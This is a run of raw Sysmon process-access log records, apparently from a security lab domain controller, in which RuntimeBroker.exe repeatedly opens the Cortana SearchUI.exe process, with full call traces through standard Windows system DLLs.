12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
